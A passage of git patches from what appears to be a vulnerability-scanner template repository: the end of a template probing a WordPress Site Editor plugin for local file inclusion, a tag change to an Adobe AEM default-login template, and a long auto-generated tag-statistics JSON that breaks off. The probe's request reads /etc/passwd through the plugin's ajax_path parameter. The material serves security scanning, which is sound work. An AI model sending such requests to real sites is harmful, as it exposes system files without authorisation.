wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body \ No newline at end of file From b98b89b42f910581f94b0619e05a133335412bb5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 20 Jul 2021 01:15:15 +0530 Subject: [PATCH 0911/4083] Tags update --- default-logins/aem/adobe-aem-default-credentials.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/default-logins/aem/adobe-aem-default-credentials.yaml b/default-logins/aem/adobe-aem-default-credentials.yaml index 254903e532..30b1006bc0 100644 --- a/default-logins/aem/adobe-aem-default-credentials.yaml +++ b/default-logins/aem/adobe-aem-default-credentials.yaml @@ -4,9 +4,7 @@ info: name: Adobe AEM Default Credentials author: random-robbie severity: critical - tags: aem,default-login - reference: - + tags: aem,default-login,fuzz requests: - payloads: From c999ea6f62940ad2fd9323256c6c5bf3b838c8c2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Jul 2021 20:15:35 +0000 Subject: [PATCH 0912/4083] Auto Generated Templates Stats [Mon Jul 19 20:15:35 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1145 +++++++++++++++++++++--------------------- 2 files changed, 573 insertions(+), 574 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index ad6fd08d99..e29c8178d0 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":462},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":166},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":111},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"takeover","count":71},{"name":"cve2021","count":70},{"name":"token","count":63},{"name":"cve2018","count":61},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"network","count":32},{"name":"iot","count":32},{"name":"oracle","count":29},{"name":"sqli","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"disclosure","count":24},{"name":"logs","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"listing","count":15},{"name":"cisco","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"cve2015","count":13},{"name":"debug","count":13},{"name":"android","count":12},{"name":"weblogic","count":12},{"name":"fuzz","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"dns","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"cve2012","count":9},{"name":"magento","count":9},{"name":"jenkins","count":9},{"name":"dlink","count":9},{"name":"gitlab","count":8},{"name":"ftp","count":8},{"name":"cve2013","count":8},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"airflow","count":8},{"name":"php","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"cve2014","count":7},{"name":"api","count":6},{"name":"google","count":6},{"name":"xxe","count":6},{"name":"nginx","count":6},{"name":"cms","count":6},{"name":"rails","count":6},{"name":"backup","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"lucee","count":5},{"name":"circarlife","count":5},{"name":"jetty","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"dell","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"login","count":5},{"name":"drupal","count":5},{"name":"ruijie","count":5},{"name":"phpmyadmin","count":5},{"name":"confluence","count":5},{"name":"laravel","count":5},{"name":"iis","count":5},{"name":"tomcat","count":4},{"name":"router","count":4},{"name":"magmi","count":4},{"name":"netgear","count":4},{"name":"artifactory","count":4},{"name":"jolokia","count":4},{"name":"django","count":4},{"name":"cve2009","count":4},{"name":"thinkcmf","count":4},{"name":"ibm","count":4},{"name":"docker","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"samsung","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"fileupload","count":4},{"name":"elastic","count":4},{"name":"vpn","count":4},{"name":"nodejs","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"webserver","count":4},{"name":"amazon","count":3},{"name":"backups","count":3},{"name":"dedecms","count":3},{"name":"springcloud","count":3},{"name":"git","count":3},{"name":"log","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"crlf","count":3},{"name":"slack","count":3},{"name":"openssh","count":3},{"name":"nosqli","count":3},{"name":"fpd","count":3},{"name":"bypass","count":3},{"name":"terramaster","count":3},{"name":"deserialization","count":3},{"name":"nacos","count":3},{"name":"microstrategy","count":3},{"name":"mongodb","count":3},{"name":"kubernetes","count":3},{"name":"printer","count":3},{"name":"ssh","count":3},{"name":"caucho","count":3},{"name":"windows","count":3},{"name":"lfr","count":3},{"name":"oa","count":3},{"name":"kafka","count":3},{"name":"fanruan","count":3},{"name":"r-seenet","count":3},{"name":"grafana","count":3},{"name":"ebs","count":3},{"name":"ofbiz","count":3},{"name":"splunk","count":2},{"name":"nextjs","count":2},{"name":"natshell","count":2},{"name":"openfire","count":2},{"name":"sonarqube","count":2},{"name":"mail","count":2},{"name":"kentico","count":2},{"name":"telerik","count":2},{"name":"httpd","count":2},{"name":"wordfence","count":2},{"name":"service","count":2},{"name":"jellyfin","count":2},{"name":"voipmonitor","count":2},{"name":"chamilo","count":2},{"name":"hp","count":2},{"name":"sharepoint","count":2},{"name":"waf","count":2},{"name":"bitrix","count":2},{"name":"huawei","count":2},{"name":"intrusive","count":2},{"name":"activemq","count":2},{"name":"rockmongo","count":2},{"name":"microsoft","count":2},{"name":"zhiyuan","count":2},{"name":"sonicwall","count":2},{"name":"icewarp","count":2},{"name":"seeyon","count":2},{"name":"saltstack","count":2},{"name":"trixbox","count":2},{"name":"ucmdb","count":2},{"name":"spark","count":2},{"name":"cve2008","count":2},{"name":"fortios","count":2},{"name":"coldfusion","count":2},{"name":"hashicorp","count":2},{"name":"globalprotect","count":2},{"name":"shellshock","count":2},{"name":"prometheus","count":2},{"name":"kibana","count":2},{"name":"jboss","count":2},{"name":"keycloak","count":2},{"name":"xxljob","count":2},{"name":"nexus","count":2},{"name":"emerge","count":2},{"name":"couchdb","count":2},{"name":"leak","count":2},{"name":"ecology","count":2},{"name":"zabbix","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"webcam","count":2},{"name":"strapi","count":2},{"name":"dos","count":2},{"name":"showdoc","count":2},{"name":"glassfish","count":2},{"name":"hpe","count":2},{"name":"plesk","count":2},{"name":"mida","count":2},{"name":"cache","count":2},{"name":"openam","count":2},{"name":"injection","count":2},{"name":"rockethchat","count":2},{"name":"odoo","count":2},{"name":"smtp","count":2},{"name":"proxy","count":2},{"name":"vrealize","count":2},{"name":"oauth","count":2},{"name":"bigip","count":2},{"name":"frp","count":2},{"name":"pega","count":2},{"name":"flir","count":2},{"name":"maian","count":2},{"name":"paloalto","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"nagios","count":2},{"name":"exposures","count":2},{"name":"smb","count":2},{"name":"huijietong","count":1},{"name":"mobileiron","count":1},{"name":"bolt","count":1},{"name":"postgres","count":1},{"name":"dom","count":1},{"name":"timeclock","count":1},{"name":"redis","count":1},{"name":"grav","count":1},{"name":"redhat","count":1},{"name":"anchorcms","count":1},{"name":"rdp","count":1},{"name":"sarg","count":1},{"name":"springframework","count":1},{"name":"spectracom","count":1},{"name":"visionhub","count":1},{"name":"enum","count":1},{"name":"tongda","count":1},{"name":"harbor","count":1},{"name":"horde","count":1},{"name":"lotuscms","count":1},{"name":"symfony","count":1},{"name":"ambari","count":1},{"name":"plone","count":1},{"name":"centos","count":1},{"name":"apiman","count":1},{"name":"socomec","count":1},{"name":"fortinet","count":1},{"name":"zcms","count":1},{"name":"salesforce","count":1},{"name":"darkstat","count":1},{"name":"enumeration","count":1},{"name":"jsp","count":1},{"name":"ueditor","count":1},{"name":"mantisbt","count":1},{"name":"nedi","count":1},{"name":"openerp","count":1},{"name":"mailchimp","count":1},{"name":"etouch","count":1},{"name":"dlogin","count":1},{"name":"redwood","count":1},{"name":"linksys","count":1},{"name":"fuelcms","count":1},{"name":"jitsi","count":1},{"name":"xdcms","count":1},{"name":"fortilogger","count":1},{"name":"landray","count":1},{"name":"javascript","count":1},{"name":"hasura","count":1},{"name":"wamp","count":1},{"name":"setup","count":1},{"name":"mediumish","count":1},{"name":"acexy","count":1},{"name":"opensns","count":1},{"name":"targa","count":1},{"name":"cve2005","count":1},{"name":"swagger","count":1},{"name":"cors","count":1},{"name":"zmanda","count":1},{"name":"mirai","count":1},{"name":"finereport","count":1},{"name":"zookeeper","count":1},{"name":"blind","count":1},{"name":"tenda","count":1},{"name":"pgadmin","count":1},{"name":"akamai","count":1},{"name":"mautic","count":1},{"name":"traefik","count":1},{"name":"octobercms","count":1},{"name":"fastapi","count":1},{"name":"kubeflow","count":1},{"name":"javafaces","count":1},{"name":"ssl","count":1},{"name":"svn","count":1},{"name":"episerver","count":1},{"name":"axis","count":1},{"name":"dotnetnuke","count":1},{"name":"bookstack","count":1},{"name":"thinkadmin","count":1},{"name":"cve2007","count":1},{"name":"node","count":1},{"name":"pacsone","count":1},{"name":"netis","count":1},{"name":"powercreator","count":1},{"name":"itop","count":1},{"name":"wp-theme","count":1},{"name":"b2evolution","count":1},{"name":"glances","count":1},{"name":"klog","count":1},{"name":"upload","count":1},{"name":"rujjie","count":1},{"name":"arl","count":1},{"name":"tpshop","count":1},{"name":"interlib","count":1},{"name":"webui","count":1},{"name":"expn","count":1},{"name":"blackboard","count":1},{"name":"nette","count":1},{"name":"drone","count":1},{"name":"szhe","count":1},{"name":"biometrics","count":1},{"name":"shopware","count":1},{"name":"ulterius","count":1},{"name":"rsyncd","count":1},{"name":"eyou","count":1},{"name":"extractor","count":1},{"name":"keenetic","count":1},{"name":"phpunit","count":1},{"name":"k8s","count":1},{"name":"jmx","count":1},{"name":"calendarix","count":1},{"name":"linkedin","count":1},{"name":"rubedo","count":1},{"name":"ems","count":1},{"name":"ntopng","count":1},{"name":"netsweeper","count":1},{"name":"bitly","count":1},{"name":"rabbitmq","count":1},{"name":"openrestry","count":1},{"name":"revision","count":1},{"name":"geddy","count":1},{"name":"yachtcontrol","count":1},{"name":"jsf","count":1},{"name":"cobub","count":1},{"name":"skywalking","count":1},{"name":"wuzhicms","count":1},{"name":"payara","count":1},{"name":"heroku","count":1},{"name":"tensorboard","count":1},{"name":"blue-ocean","count":1},{"name":"ioncube","count":1},{"name":"wiki","count":1},{"name":"ganglia","count":1},{"name":"mongoshake","count":1},{"name":"wildfly","count":1},{"name":"faraday","count":1},{"name":"tensorflow","count":1},{"name":"viewpoint","count":1},{"name":"mcafee","count":1},{"name":"emby","count":1},{"name":"bash","count":1},{"name":"bruteforce","count":1},{"name":"diris","count":1},{"name":"webmodule-ee","count":1},{"name":"db","count":1},{"name":"opencast","count":1},{"name":"feifeicms","count":1},{"name":"ecom","count":1},{"name":"tileserver","count":1},{"name":"zeroshell","count":1},{"name":"soar","count":1},{"name":"domxss","count":1},{"name":"discord","count":1},{"name":"bullwark","count":1},{"name":"nsasg","count":1},{"name":"druid","count":1},{"name":"codeigniter","count":1},{"name":"uwsgi","count":1},{"name":"acme","count":1},{"name":"beanshell","count":1},{"name":"hortonworks","count":1},{"name":"empirecms","count":1},{"name":"stem","count":1},{"name":"rhymix","count":1},{"name":"jeewms","count":1},{"name":"mpsec","count":1},{"name":"woocomernce","count":1},{"name":"xunchi","count":1},{"name":"adminer","count":1},{"name":"nc2","count":1},{"name":"flash","count":1},{"name":"subrion","count":1},{"name":"goahead","count":1},{"name":"kyan","count":1},{"name":"crm","count":1},{"name":"shopxo","count":1},{"name":"cloudflare","count":1},{"name":"igs","count":1},{"name":"primetek","count":1},{"name":"gloo","count":1},{"name":"cve2010","count":1},{"name":"monitorix","count":1},{"name":"nomad","count":1},{"name":"wooyun","count":1},{"name":"sitecore","count":1},{"name":"circontrorl","count":1},{"name":"selea","count":1},{"name":"panos","count":1},{"name":"parentlink","count":1},{"name":"lanproxy","count":1},{"name":"kerbynet","count":1},{"name":"nuuo","count":1},{"name":"sqlite","count":1},{"name":"rfi","count":1},{"name":"seacms","count":1},{"name":"javamelody","count":1},{"name":"aspnuke","count":1},{"name":"xml","count":1},{"name":"avtech","count":1},{"name":"myucms","count":1},{"name":"viewlinc","count":1},{"name":"ricoh","count":1},{"name":"ruby","count":1},{"name":"doh","count":1},{"name":"azure","count":1},{"name":"spidercontrol","count":1},{"name":"scs","count":1},{"name":"memcached","count":1},{"name":"totaljs","count":1},{"name":"phalcon","count":1},{"name":"majordomo2","count":1},{"name":"sidekiq","count":1},{"name":"fortigates","count":1},{"name":"wmt","count":1},{"name":"fortiweb","count":1},{"name":"dvwa","count":1},{"name":"dompdf","count":1},{"name":"zarafa","count":1},{"name":"robomongo","count":1},{"name":"moin","count":1},{"name":"jnoj","count":1},{"name":"smartsense","count":1},{"name":"vscode","count":1},{"name":"zm","count":1},{"name":"pyramid","count":1},{"name":"phpinfo","count":1},{"name":"panabit","count":1},{"name":"wso2","count":1},{"name":"circontrol","count":1},{"name":"floc","count":1},{"name":"tamronos","count":1},{"name":"zend","count":1},{"name":"haproxy","count":1},{"name":"jfrog","count":1},{"name":"esmtp","count":1},{"name":"yii","count":1},{"name":"csrf","count":1},{"name":"zimbra","count":1},{"name":"svnserve","count":1},{"name":"sentry","count":1},{"name":"hadoop","count":1},{"name":"webadmin","count":1},{"name":"ec2","count":1},{"name":"alibaba","count":1},{"name":"appweb","count":1},{"name":"nuxeo","count":1},{"name":"krweb","count":1},{"name":"ssltls","count":1},{"name":"liferay","count":1},{"name":"email","count":1},{"name":"wazuh","count":1},{"name":"landrayoa","count":1},{"name":"fedora","count":1},{"name":"plastic","count":1},{"name":"checkpoint","count":1},{"name":"clave","count":1},{"name":"jquery","count":1},{"name":"maccmsv10","count":1},{"name":"gateone","count":1},{"name":"synnefo","count":1},{"name":"weiphp","count":1},{"name":"upnp","count":1},{"name":"st","count":1},{"name":"gridx","count":1},{"name":"servicedesk","count":1},{"name":"saltapi","count":1},{"name":"trilithic","count":1},{"name":"aura","count":1},{"name":"fastcgi","count":1},{"name":"csod","count":1},{"name":"labtech","count":1},{"name":"concrete","count":1},{"name":"status","count":1},{"name":"tika","count":1},{"name":"rmi","count":1},{"name":"starttls","count":1},{"name":"grails","count":1},{"name":"mdb","count":1},{"name":"vsphere","count":1},{"name":"pulsesecure","count":1},{"name":"vsftpd","count":1},{"name":"netrc","count":1},{"name":"wifisky","count":1},{"name":"74cms","count":1},{"name":"dotnet","count":1},{"name":"backdoor","count":1},{"name":"fiori","count":1},{"name":"lansweeper","count":1},{"name":"chinaunicom","count":1},{"name":"exchange","count":1},{"name":"duomicms","count":1},{"name":"firebase","count":1},{"name":"realteo","count":1},{"name":"opensmtpd","count":1},{"name":"rmc","count":1},{"name":"sprintful","count":1},{"name":"xiuno","count":1},{"name":"tapestry","count":1},{"name":"livezilla","count":1},{"name":"spring","count":1},{"name":"openstack","count":1},{"name":"k8","count":1},{"name":"gitlist","count":1},{"name":"codemeter","count":1},{"name":"idemia","count":1},{"name":"mysql","count":1},{"name":"jenkin","count":1},{"name":"portainer","count":1},{"name":"plc","count":1},{"name":"spf","count":1},{"name":"sco","count":1},{"name":"octoprint","count":1},{"name":"oscommerce","count":1},{"name":"optiLink","count":1},{"name":"netdata","count":1},{"name":"avalanche","count":1},{"name":"webftp","count":1},{"name":"opm","count":1},{"name":"zenario","count":1},{"name":"kafdrop","count":1},{"name":"gogs","count":1},{"name":"emc","count":1},{"name":"alertmanager","count":1},{"name":"cocoon","count":1},{"name":"pippoint","count":1},{"name":"nordex","count":1},{"name":"timesheet","count":1},{"name":"mara","count":1},{"name":"alerta","count":1},{"name":"2014","count":1},{"name":"erp-nc","count":1},{"name":"kong","count":1},{"name":"nexusdb","count":1},{"name":"ns","count":1},{"name":"dvr","count":1},{"name":"plugin","count":1},{"name":"turbocrm","count":1},{"name":"linkerd","count":1},{"name":"npm","count":1},{"name":"embedthis","count":1},{"name":"fortigate","count":1},{"name":"servicenow","count":1},{"name":"lancom","count":1},{"name":"cse","count":1},{"name":"proftpd","count":1},{"name":"triconsole","count":1},{"name":"comodo","count":1},{"name":"webmin","count":1},{"name":"cloudinary","count":1},{"name":"metinfo","count":1},{"name":"geutebruck","count":1},{"name":"clockwatch","count":1},{"name":"discourse","count":1},{"name":"mongo","count":1},{"name":"nps","count":1},{"name":"wavemaker","count":1},{"name":"htmli","count":1},{"name":"cgi","count":1},{"name":"zte","count":1},{"name":"varnish","count":1},{"name":"xff","count":1},{"name":"razor","count":1},{"name":"opentsdb","count":1},{"name":"ilo4","count":1},{"name":"clusterengine","count":1},{"name":"jenzabar","count":1},{"name":"postmessage","count":1},{"name":"flink","count":1},{"name":"moinmoin","count":1},{"name":"node-red-dashboard","count":1},{"name":"favicon","count":1},{"name":"zzzcms","count":1}],"authors":[{"name":"dhiyaneshdk","count":202},{"name":"pdteam","count":184},{"name":"pikpikcu","count":177},{"name":"dwisiswant0","count":113},{"name":"geeknik","count":88},{"name":"daffainfo","count":78},{"name":"madrobot","count":59},{"name":"princechaddha","count":50},{"name":"gaurang","count":42},{"name":"gy741","count":35},{"name":"ice3man","count":26},{"name":"pussycat0x","count":25},{"name":"0x_akoko","count":20},{"name":"organiccrap","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"pr3r00t","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"wdahlenb","count":8},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"r3dg33k","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"melbadry9","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"that_juan_","count":7},{"name":"0x240x23elu","count":7},{"name":"philippedelteil","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"caspergn","count":5},{"name":"rootxharsh","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"tess","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"0w4ys","count":3},{"name":"kophjager007","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"joanbono","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"binaryfigments","count":3},{"name":"vavkamil","count":2},{"name":"x1m_martijn","count":2},{"name":"bp0lr","count":2},{"name":"lotusdll","count":2},{"name":"swissky","count":2},{"name":"pxmme1337","count":2},{"name":"emenalf","count":2},{"name":"kiblyn11","count":2},{"name":"lu4nx","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"0xprial","count":2},{"name":"0xrudra","count":2},{"name":"0xsapra","count":2},{"name":"shifacyclewala","count":2},{"name":"incogbyte","count":2},{"name":"elsfa7110","count":2},{"name":"davidmckennirey","count":2},{"name":"joeldeleep","count":2},{"name":"0xelkomy","count":2},{"name":"udit_thakkur","count":2},{"name":"ehsahil","count":2},{"name":"unstabl3","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"random-robbie","count":2},{"name":"gevakun","count":2},{"name":"zomsop82","count":2},{"name":"ree4pwn","count":2},{"name":"jarijaas","count":2},{"name":"foulenzer","count":2},{"name":"moritz nentwig","count":2},{"name":"0xcrypto","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"bsysop","count":2},{"name":"dheerajmadhukar","count":2},{"name":"mavericknerd","count":2},{"name":"amsda","count":2},{"name":"streetofhackerr007","count":1},{"name":"_generic_human_","count":1},{"name":"mah3sec_","count":1},{"name":"wabafet","count":1},{"name":"c3l3si4n","count":1},{"name":"abison_binoy","count":1},{"name":"elmahdi","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"alex","count":1},{"name":"daviey","count":1},{"name":"yavolo","count":1},{"name":"micha3lb3n","count":1},{"name":"notsoevilweasel","count":1},{"name":"dudez","count":1},{"name":"koti2","count":1},{"name":"hakluke","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"juicypotato1","count":1},{"name":"thezakman","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"fopina","count":1},{"name":"nytr0gen","count":1},{"name":"w4cky_","count":1},{"name":"thevillagehacker","count":1},{"name":"mubassirpatel","count":1},{"name":"soyelmago","count":1},{"name":"yashanand155","count":1},{"name":"berkdusunur","count":1},{"name":"ringo","count":1},{"name":"bjhulst","count":1},{"name":"b4uh0lz","count":1},{"name":"kareemse1im","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kurohost","count":1},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"whynotke","count":1},{"name":"omarkurt","count":1},{"name":"0h1in9e","count":1},{"name":"sy3omda","count":1},{"name":"regala_","count":1},{"name":"j33n1k4","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"ooooooo_q","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"manuelbua","count":1},{"name":"cookiehanhoan","count":1},{"name":"mhdsamx","count":1},{"name":"rojanrijal","count":1},{"name":"furkansenan","count":1},{"name":"blckraven","count":1},{"name":"luskabol","count":1},{"name":"luci","count":1},{"name":"vsh00t","count":1},{"name":"undefl0w","count":1},{"name":"0xrod","count":1},{"name":"52971","count":1},{"name":"gal nagli","count":1},{"name":"iampritam","count":1},{"name":"knassar702","count":1},{"name":"th3.d1p4k","count":1},{"name":"_harleo","count":1},{"name":"becivells","count":1},{"name":"shifacyclewla","count":1},{"name":"flag007","count":1},{"name":"patralos","count":1},{"name":"ilovebinbash","count":1},{"name":"r3naissance","count":1},{"name":"sullo","count":1},{"name":"chron0x","count":1},{"name":"@dwisiswant0","count":1},{"name":"co0nan","count":1},{"name":"_c0wb0y_","count":1},{"name":"sickwell","count":1},{"name":"defr0ggy","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"hanlaomo","count":1},{"name":"jeya seelan","count":1},{"name":"fabaff","count":1},{"name":"zandros0","count":1},{"name":"apt-mirror","count":1},{"name":"taielab","count":1},{"name":"yashgoti","count":1},{"name":"remonsec","count":1},{"name":"bing0o","count":1},{"name":"tirtha_mandal","count":1},{"name":"divya_mudgal","count":1},{"name":"qlkwej","count":1},{"name":"willd96","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ajaysenr","count":1},{"name":"sshell","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"its0x08","count":1},{"name":"schniggie","count":1},{"name":"alifathi-h1","count":1},{"name":"pudsec","count":1},{"name":"nkxxkn","count":1},{"name":"pdp","count":1},{"name":"kabirsuda","count":1},{"name":"shreyapohekar","count":1},{"name":"mohammedsaneem","count":1},{"name":"dawid czarnecki","count":1},{"name":"raesene","count":1},{"name":"0ut0fb4nd","count":1},{"name":"smaranchand","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"exploitation","count":1},{"name":"_darrenmartyn","count":1},{"name":"zhenwarx","count":1},{"name":"alperenkesk","count":1},{"name":"0xtavian","count":1},{"name":"ohlinge","count":1},{"name":"shelld3v","count":1},{"name":"akshansh","count":1},{"name":"gboddin","count":1},{"name":"affix","count":1},{"name":"rtcms","count":1},{"name":"toufik airane","count":1},{"name":"sicksec","count":1},{"name":"ldionmarcil","count":1},{"name":"arcc","count":1},{"name":"idealphase","count":1},{"name":"naglinagli","count":1},{"name":"johnjhacking","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"andirrahmani1","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"dogasantos","count":1},{"name":"bolli95","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"vzamanillo","count":1},{"name":"rodnt","count":1},{"name":"noamrathaus","count":1},{"name":"deena","count":1},{"name":"s1r1u5_","count":1},{"name":"bad5ect0r","count":1},{"name":"ipanda","count":1},{"name":"akash.c","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"ahmed sherif","count":1},{"name":"johnk3r","count":1}],"directory":[{"name":"cves","count":468},{"name":"vulnerabilities","count":234},{"name":"exposed-panels","count":202},{"name":"exposures","count":150},{"name":"technologies","count":129},{"name":"misconfiguration","count":114},{"name":"takeovers","count":70},{"name":"default-logins","count":44},{"name":"file","count":42},{"name":"workflows","count":33},{"name":"miscellaneous","count":27},{"name":"network","count":25},{"name":"iot","count":18},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":453},{"name":"high","count":396},{"name":"medium","count":312},{"name":"critical","count":186},{"name":"low","count":150}],"types":[{"name":"http","count":1408},{"name":"file","count":42},{"name":"network","count":32},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":464},{"name":"panel","count":201},{"name":"xss","count":168},{"name":"wordpress","count":165},{"name":"rce","count":161},{"name":"exposure","count":154},{"name":"cve2020","count":135},{"name":"lfi","count":127},{"name":"wp-plugin","count":110},{"name":"cve2019","count":82},{"name":"config","count":81},{"name":"tech","count":72},{"name":"cve2021","count":71},{"name":"takeover","count":71},{"name":"token","count":63},{"name":"cve2018","count":62},{"name":"apache","count":60},{"name":"default-login","count":45},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":39},{"name":"iot","count":33},{"name":"network","count":32},{"name":"sqli","count":29},{"name":"oracle","count":29},{"name":"workflow","count":28},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":25},{"name":"ssrf","count":25},{"name":"oob","count":24},{"name":"logs","count":24},{"name":"disclosure","count":24},{"name":"redirect","count":20},{"name":"aem","count":18},{"name":"cisco","count":15},{"name":"listing","count":15},{"name":"cve2016","count":14},{"name":"sap","count":14},{"name":"debug","count":13},{"name":"cve2015","count":13},{"name":"fuzz","count":13},{"name":"misconfig","count":13},{"name":"struts","count":13},{"name":"weblogic","count":12},{"name":"android","count":12},{"name":"auth-bypass","count":11},{"name":"zoho","count":11},{"name":"dns","count":11},{"name":"springboot","count":11},{"name":"devops","count":10},{"name":"cve2011","count":10},{"name":"magento","count":9},{"name":"jenkins","count":9},{"name":"cve2012","count":9},{"name":"dlink","count":9},{"name":"adobe","count":8},{"name":"aws","count":8},{"name":"php","count":8},{"name":"cve2013","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"cnvd","count":8},{"name":"joomla","count":7},{"name":"scada","count":7},{"name":"cve2014","count":7},{"name":"vmware","count":7},{"name":"cms","count":6},{"name":"xxe","count":6},{"name":"backup","count":6},{"name":"nginx","count":6},{"name":"rails","count":6},{"name":"google","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"ruijie","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"confluence","count":5},{"name":"headless","count":5},{"name":"laravel","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"dell","count":5},{"name":"lucee","count":5},{"name":"login","count":5},{"name":"jetty","count":5},{"name":"solr","count":5},{"name":"nodejs","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"fileupload","count":4},{"name":"jolokia","count":4},{"name":"webserver","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"ibm","count":4},{"name":"tomcat","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"hongdian","count":4},{"name":"router","count":4},{"name":"django","count":4},{"name":"elastic","count":4},{"name":"thinkphp","count":4},{"name":"docker","count":4},{"name":"netgear","count":4},{"name":"cve2009","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"samsung","count":4},{"name":"springcloud","count":3},{"name":"lfr","count":3},{"name":"dedecms","count":3},{"name":"git","count":3},{"name":"printer","count":3},{"name":"nosqli","count":3},{"name":"nacos","count":3},{"name":"slack","count":3},{"name":"resin","count":3},{"name":"vbulletin","count":3},{"name":"bypass","count":3},{"name":"mongodb","count":3},{"name":"ssh","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"deserialization","count":3},{"name":"windows","count":3},{"name":"openssh","count":3},{"name":"ebs","count":3},{"name":"kubernetes","count":3},{"name":"amazon","count":3},{"name":"crlf","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"r-seenet","count":3},{"name":"microstrategy","count":3},{"name":"backups","count":3},{"name":"ofbiz","count":3},{"name":"caucho","count":3},{"name":"terramaster","count":3},{"name":"grafana","count":3},{